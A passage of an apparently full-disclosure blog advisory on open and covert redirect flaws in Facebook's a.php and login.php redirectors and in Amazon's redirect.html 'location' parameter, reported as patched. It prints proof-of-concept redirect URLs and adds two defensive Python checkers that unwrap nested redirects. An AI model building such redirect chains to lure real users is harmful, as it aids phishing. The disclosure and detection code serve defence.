sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&mac=<wbr></wbr>AQJllyaGzLYoRoQz&__tn__=%2AB&<wbr></wbr>eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
<div>
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&eid=<wbr></wbr>5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3.2) Facebook Login Page Covert Redirect Security Vulnerability</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL Related to Login.php Based on a.php:</b></span></div>
<div>
<a href="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.php%3Fu%3Dhttp%253A%252F%252Fwww.rp.edu.sg%252Fopenhouse2014%252F%253Futm_source%253Dfacebook%2526utm_medium%253Dcpc%2526utm_campaign%253Dopenhouse2014%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid%3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROStFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJtC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN_tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dHx1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwWxeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7EcZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBtj5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1695OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSred73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs" target="_blank"><span style="color: black; font-family: Arial, Helvetica, 
sans-serif;">https://www.facebook.com/<wbr></wbr>login.php?next=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fa.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>rp.edu.sg%252Fopenhouse2014%<wbr></wbr>252F%253Futm_source%<wbr></wbr>253Dfacebook%2526utm_medium%<wbr></wbr>253Dcpc%2526utm_campaign%<wbr></wbr>253Dopenhouse2014%26mac%<wbr></wbr>3DAQKyRHClixA20iGL%26__tn__%<wbr></wbr>3D%252AB%26eid%<wbr></wbr>3DAQLAHC7szSXhT3FaEBXe5YFsOC0k<wbr></wbr>EM4nN9PlVovdilvuzROStFXoYqptlK<wbr></wbr>pcJAzHNTLpxWAIrmJYsR6RVG_<wbr></wbr>Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_<wbr></wbr>eVS895Eh6fSwxH3fgfWcNDrEl5_<wbr></wbr>lFgRbrJtC71R68rW_<wbr></wbr>VXS9QCN7Po9wTWDnbyZTaXawdrdQyi<wbr></wbr>bryvA56Spr5GcUDUboRFxy8YSr2ahU<wbr></wbr>V_<wbr></wbr>goDAQA3OKmCACEn8CmyMrOT5gZq3iw<wbr></wbr>usysdchRxLIv5N82-<wbr></wbr>GMTiDxXXgkDYf1P7XwvklWpfy_<wbr></wbr>cEItZzV5v0P7fRZB3qiq_<wbr></wbr>RDx9jhEzndlJhUJL2aWE0ldPmGKGz9<wbr></wbr>xWyvPaPLOwzBo23GQbpj2ZN_<wbr></wbr>tw9B9tz2l3tGIN1yegd_<wbr></wbr>Wf6PSFIZOuBXfZILvmILcxg3qz4dHx<wbr></wbr>1fmgPZBpf_34mPnMEkgZqbT2WeV_<wbr></wbr>GZKz8RDIg88D3vrmwyMwWxeh3xyGud<wbr></wbr>djZUjOUjPCUwrgSrWZK3XHRA7TA7tW<wbr></wbr>IsQ4X1bsjx9c72mm8bZmmRBRJwqOcj<wbr></wbr>sW0QEVETs_<wbr></wbr>Cs9pS9QBkgX8yVPJCHuk1v_<wbr></wbr>xkj4EHHH9sNP7a4GRs8olklBTKhCcJ<wbr></wbr>908sVrQVT2I-<wbr></wbr>cQYw2SVU9hWaWWjX2AGt3WpdT2kx6S<wbr></wbr>IPoPQpX5cIC4Lcfaa7EcZFBnoQPv3m<wbr></wbr>R5BNHRFTh_<wbr></wbr>6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt<wbr></wbr>j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8<wbr></wbr>V4qiKiVFKTEFMZASaZFon41VFCbhxk<wbr></wbr>X0Bi62Ko64PY6uP64tCMWh6yX2o0JM<wbr></wbr>c0mJWFJRp1695OCKgLXf0udRyWDEST<wbr></wbr>yYgJXIlxecCmlwCEbleAsE-<wbr></wbr>wtDXNOfDTXOzApr1sZO_58FBRaw-<wbr></wbr>K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur<wbr></wbr>9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-<wbr></wbr>UqdakiEEIBq750KxVjaAdCyqJp_<wbr></wbr>5EJ-<wbr></wbr>yVMK3f2pMX7cQ2Lw6u434hHimuLN9V<wbr></wbr>DPLkpSiMlPOa8RkarDSred73IfQiv-<wbr></wbr>PluegYDfunZFxj1KvcAlzhVZsL-<wbr></wbr>a52hJmXrOrzKuV0hyZaBLtAIo6AEoX<wbr></wbr>XV30D-<wbr></wbr>6iraSUphk
OFzYt3ah6oRrmXLQZKm2E<wbr></wbr>8Cuag5d_<wbr></wbr>rAnwvIr98dn4OSa8Z4MCZemI3uH8cj<wbr></wbr>xr86aE046uTA_<wbr></wbr>Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h<wbr></wbr>6WiUO-<wbr></wbr>jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl<wbr></wbr>18iaN8wkylsTk8aVBn6G1xZadSL0b5<wbr></wbr>R3NgsYfQUVtV0g9slnOLNkgq0NLMAk<wbr></wbr>0kWFs</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
<div>
<a href="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.php%3Fu%3Dhttp%253A%252F%252Fwww.tetraph.com%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid%3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROStFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJtC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN_tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dHx1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwWxeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7EcZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBtj5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1695OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSred73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs" target="_blank"><span style="color: black; font-family: Arial, Helvetica, 
sans-serif;">https://www.facebook.com/<wbr></wbr>login.php?next=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fa.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.stackoverflow.com%26mac%<wbr></wbr>3DAQKyRHClixA20iGL%26__tn__%<wbr></wbr>3D%252AB%26eid%<wbr></wbr>3DAQLAHC7szSXhT3FaEBXe5YFsOC0k<wbr></wbr>EM4nN9PlVovdilvuzROStFXoYqptlK<wbr></wbr>pcJAzHNTLpxWAIrmJYsR6RVG_<wbr></wbr>Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_<wbr></wbr>eVS895Eh6fSwxH3fgfWcNDrEl5_<wbr></wbr>lFgRbrJtC71R68rW_<wbr></wbr>VXS9QCN7Po9wTWDnbyZTaXawdrdQyi<wbr></wbr>bryvA56Spr5GcUDUboRFxy8YSr2ahU<wbr></wbr>V_<wbr></wbr>goDAQA3OKmCACEn8CmyMrOT5gZq3iw<wbr></wbr>usysdchRxLIv5N82-<wbr></wbr>GMTiDxXXgkDYf1P7XwvklWpfy_<wbr></wbr>cEItZzV5v0P7fRZB3qiq_<wbr></wbr>RDx9jhEzndlJhUJL2aWE0ldPmGKGz9<wbr></wbr>xWyvPaPLOwzBo23GQbpj2ZN_<wbr></wbr>tw9B9tz2l3tGIN1yegd_<wbr></wbr>Wf6PSFIZOuBXfZILvmILcxg3qz4dHx<wbr></wbr>1fmgPZBpf_34mPnMEkgZqbT2WeV_<wbr></wbr>GZKz8RDIg88D3vrmwyMwWxeh3xyGud<wbr></wbr>djZUjOUjPCUwrgSrWZK3XHRA7TA7tW<wbr></wbr>IsQ4X1bsjx9c72mm8bZmmRBRJwqOcj<wbr></wbr>sW0QEVETs_<wbr></wbr>Cs9pS9QBkgX8yVPJCHuk1v_<wbr></wbr>xkj4EHHH9sNP7a4GRs8olklBTKhCcJ<wbr></wbr>908sVrQVT2I-<wbr></wbr>cQYw2SVU9hWaWWjX2AGt3WpdT2kx6S<wbr></wbr>IPoPQpX5cIC4Lcfaa7EcZFBnoQPv3m<wbr></wbr>R5BNHRFTh_<wbr></wbr>6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt<wbr></wbr>j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8<wbr></wbr>V4qiKiVFKTEFMZASaZFon41VFCbhxk<wbr></wbr>X0Bi62Ko64PY6uP64tCMWh6yX2o0JM<wbr></wbr>c0mJWFJRp1695OCKgLXf0udRyWDEST<wbr></wbr>yYgJXIlxecCmlwCEbleAsE-<wbr></wbr>wtDXNOfDTXOzApr1sZO_58FBRaw-<wbr></wbr>K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur<wbr></wbr>9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-<wbr></wbr>UqdakiEEIBq750KxVjaAdCyqJp_<wbr></wbr>5EJ-<wbr></wbr>yVMK3f2pMX7cQ2Lw6u434hHimuLN9V<wbr></wbr>DPLkpSiMlPOa8RkarDSred73IfQiv-<wbr></wbr>PluegYDfunZFxj1KvcAlzhVZsL-<wbr></wbr>a52hJmXrOrzKuV0hyZaBLtAIo6AEoX<wbr></wbr>XV30D-<wbr></wbr>6iraSUphkOFzYt3ah6oRrmXLQZKm2E<wbr></wbr>8Cuag5d_<wbr></wbr>rAnwvIr98dn4OSa8Z4MCZemI3uH8cj<wbr></wbr>xr86aE046uTA_<wbr></wbr>Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h<wbr></wbr
>6WiUO-<wbr></wbr>jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl<wbr></wbr>18iaN8wkylsTk8aVBn6G1xZadSL0b5<wbr></wbr>R3NgsYfQUVtV0g9slnOLNkgq0NLMAk<wbr></wbr>0kWFs</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
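<div>
<span style="font-family: Arial, Helvetica, sans-serif;">In (3.2) the off-site destination is nested two levels deep: "login.php" carries "next", which points at "a.php", which carries "u". The following is an added example, not part of the original advisory, of a static check that unwraps such chains in logged or submitted links and reports whether the final hop leaves the trusted domain. The redirector table uses the files and parameters named on this page; the hop limit, the sample links and the ".example" hosts are constructed assumptions.</span></div>

```python
from urllib.parse import parse_qs, urlsplit

# Redirector paths and their destination parameters, as named in the advisory.
REDIRECTORS = {
    "/l.php": ("u",),
    "/a.php": ("u",),
    "/campaign/landing.php": ("url", "next"),
    "/login.php": ("next",),
}
TRUSTED_DOMAIN = "facebook.com"
MAX_HOPS = 5  # assumption: deeper nesting is not followed


def _host(url):
    try:
        return (urlsplit(url).hostname or "").lower().rstrip(".")
    except ValueError:  # e.g. a malformed IPv6 literal
        return ""


def is_trusted(host):
    # Exact match or a true subdomain; "facebook.com.other.example" does not match.
    return host == TRUSTED_DOMAIN or host.endswith("." + TRUSTED_DOMAIN)


def unwrap(link):
    """Return the chain of URLs reached by following redirect parameters.

    Nothing is fetched. Each hop is read from the query string, and parse_qs
    removes exactly one level of percent-encoding per hop.
    """
    chain = [link]
    current = link
    for _ in range(MAX_HOPS):
        if not is_trusted(_host(current)):
            break  # already off-site (or unparsable): nothing more to unwrap
        parts = urlsplit(current)
        names = REDIRECTORS.get(parts.path)
        if names is None:
            break  # an ordinary page, not a redirector
        query = parse_qs(parts.query)
        target = next((query[n][0] for n in names if n in query), None)
        if target is None:
            break
        chain.append(target)
        current = target
    return chain


def flags_offsite(link):
    """True when a trusted redirector chain ends on an untrusted host."""
    chain = unwrap(link)
    return len(chain) > 1 and not is_trusted(_host(chain[-1]))


# Constructed sample with the same shape as the login.php link in (3.2).
NESTED_SAMPLE = (
    "https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com"
    "%2Fa.php%3Fu%3Dhttp%253A%252F%252Foffsite.example%252F%26eid%3DCONSTRUCTED"
)

if __name__ == "__main__":
    for hop in unwrap(NESTED_SAMPLE):
        print(hop)
    print("off-site:", flags_offsite(NESTED_SAMPLE))
```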
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Video:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be">https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be</a></span></div>
<div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog Details:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html">http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html</a></span><br />
<div>
</div>
</div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<br />
<div>
</div>
<br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Those vulnerabilities were reported to Facebook in 2014 and they have been patched.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Several other similar 0-day vulnerabilities have been found by other bug hunters before. Facebook has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" All of the following classes of web security issue have been published on FD: Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage, Denial of Service, File Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML Injection, Spam. A large number of Facebook bugs were published there. FD also publishes suggestions, advisories and solution details related to Open Redirect vulnerabilities, as well as cyber intelligence recommendations.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4) </b><b>Amazon Covert Redirect Security Vulnerability Based on Facebook </b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Since Facebook is trusted by a large number of other websites, those vulnerabilities can be used to carry out "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" against other websites such as Amazon.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Domain: </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.amazon.com/">http://www.amazon.com</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"American electronic commerce company with headquarters in Seattle, Washington. It is the largest Internet-based retailer in the United States. Amazon.com started as an online bookstore, but soon diversified, selling DVDs, Blu-rays, CDs, video downloads/streaming, MP3 downloads/streaming, software, video games, electronics, apparel, furniture, food, toys and jewelry. The company also produces consumer electronics—notably, Amazon Kindle e-book readers, Fire tablets, Fire TV and Fire Phone — and is a major provider of cloud computing services. Amazon also sells certain low-end products like USB cables under its inhouse brand AmazonBasics. Amazon has separate retail websites for United States, United Kingdom & Ireland, France, Canada, Germany, The Netherlands, Italy, Spain, Australia, Brazil, Japan, China, India and Mexico. Amazon also offers international shipping to certain other countries for some of its products. In 2011, it had professed an intention to launch its websites in Poland and Sweden." (Wikipedia)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability exists in the "redirect.html?" page, in the "&location" parameter, e.g.</span></div>
<div>
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.google.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Fl.php%3Fu%<wbr></wbr>3Dhttp%253A%252F%252Fwww.<wbr></wbr>google.com%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>More Details:</b></span></div>
<div>
<a href="http://tetraph.com/covert_redirect/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/covert_<wbr></wbr>redirect/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html" target="_blank">http://tetraph.com/covert_<wbr></wbr>redirect/oauth2_openid_covert_<wbr></wbr>redirect.html</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4.1)</b> When a user is redirected from Amazon to another site, Amazon will check the "&token" parameter. If the redirected URL's domain is OK, Amazon will allow the redirection.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">However, if the URLs in a redirected domain have open URL redirection vulnerabilities themselves, a user could be redirected from Amazon to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site. This is as if being redirected from Amazon directly.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">One of the vulnerable domains is:</span></div>
<div>
<a href="http://www.facebook.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com</span></a></div>
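The weakness described in (4.1), shown from the defender's side as an added example (not code from the original advisory or from either vendor): a host-only allowlist check accepts a target that itself carries an onward redirect, while a check that unwraps nested URL parameters rejects it. The hosts, the allowlist and the sample URLs are constructed placeholders that mirror the "location" and "l.php?u=" nesting seen on this page, and the strict policy is an assumption.

```python
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: hypothetical allowlist of hosts the redirector trusts.
ALLOWED_HOSTS = {"social.example"}
MAX_DEPTH = 4  # maximum nested redirect layers we unwrap before failing closed

# Constructed samples shaped like the URLs on this page (placeholder hosts/tokens).
BENIGN = ("http://shop.example/gp/redirect.html?_encoding=UTF8"
          "&location=http%3A%2F%2Fsocial.example%2Fbrandpage%3Fv%3Dapp_1"
          "&token=PLACEHOLDER")
CHAINED = ("http://shop.example/gp/redirect.html?_encoding=UTF8"
           "&location=http%3A%2F%2Fsocial.example%2Fl.php%3Fu%3D"
           "http%253A%252F%252Fattacker.example%26h%3DPLACEHOLDER"
           "&token=PLACEHOLDER")


def location_param(redirector_url):
    """Extract the once-decoded 'location' value from a redirector URL."""
    return dict(parse_qsl(urlsplit(redirector_url).query)).get("location", "")


def _as_url(value):
    """Decode value until it parses as an http(s) or scheme-relative URL, else None."""
    for _ in range(MAX_DEPTH):
        value = value.strip()
        parts = urlsplit(value)
        if parts.scheme.lower() in ("http", "https") and parts.hostname:
            return value
        if value.startswith("//") and urlsplit("http:" + value).hostname:
            return "http:" + value
        decoded = unquote(value)  # peel one more layer of percent-encoding
        if decoded == value:
            return None
        value = decoded
    return None


def embedded_hosts(url, depth=1):
    """Hosts of every URL carried in url's query/fragment parameters, recursively."""
    parts = urlsplit(url)
    hosts = []
    for source in (parts.query, parts.fragment):
        for _name, value in parse_qsl(source, keep_blank_values=True):
            inner = _as_url(value)
            if inner is None:
                continue
            if depth > MAX_DEPTH:
                raise ValueError("redirect nesting exceeds MAX_DEPTH")
            hosts.append(urlsplit(inner).hostname.lower())
            hosts.extend(embedded_hosts(inner, depth + 1))
    return hosts


def host_only_check(target, allowed=ALLOWED_HOSTS):
    """Weak check: accept any http(s) URL whose own host is allowlisted."""
    try:
        parts = urlsplit(target)
        host = (parts.hostname or "").lower()
    except ValueError:
        return False
    return parts.scheme.lower() in ("http", "https") and host in allowed


def chain_aware_check(target, allowed=ALLOWED_HOSTS):
    """Return (accepted, reason); reject targets that carry a URL to another host."""
    if not host_only_check(target, allowed):
        return False, "target host is not allowlisted"
    try:
        onward = embedded_hosts(target)
    except ValueError as exc:
        return False, f"unparseable or too deeply nested: {exc}"
    outside = [h for h in onward if h not in allowed]
    if outside:
        return False, "carries onward redirect to " + ", ".join(outside)
    return True, "ok"


if __name__ == "__main__":
    for sample in (BENIGN, CHAINED):
        target = location_param(sample)
        print(target, host_only_check(target), chain_aware_check(target))
```

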